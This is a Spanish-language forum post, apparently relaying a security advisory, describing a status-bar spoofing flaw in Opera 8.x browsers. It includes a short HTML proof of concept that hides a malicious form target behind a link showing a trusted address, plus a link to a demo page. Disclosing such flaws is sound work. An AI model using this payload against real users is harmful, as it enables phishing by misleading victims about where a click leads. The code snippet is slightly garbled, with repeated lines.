------------
Opera Web Browser 8.50
Opera Web Browser 8.0 2
Opera Web Browser 8.0 1
Opera Web Browser 8.0
Detalle:
---------
Un atacante puede falsificar la barra de estado del browser, permitiendo que la victima sea engañada y redireccionada a un sitio malicioso.
esta vulnerabilidad podria ser explotada, enviando un enlace HTML via e-mail, o mediante HTML injection en una web vulnerable.
Prueba de Concepto:
------------------------
Código:
<form action="[sitio malicioso]">
<a href="www.example.com"><input type="imagen" src="[imagen]" title="www.example.com"></a>
</form>
<a href="www.example.com"><input type="imagen" src="[imagen]" title="www.example.com"></a>
</form>
Prueba:
---------
http://ciberia.ya.com/webmousehack/operabug.html
al hacer click en este enlace se vera una imagen, si posicionas el cursor sobre ella indicara ¨www.google.com¨ y si hacemos doble click en la misma te redirecionara a esta web.
NOTA: no funciona con firefox pero si con IE
fuente:securityfocus
Salu2










Autor


En línea



gracias por hacermelo notar 
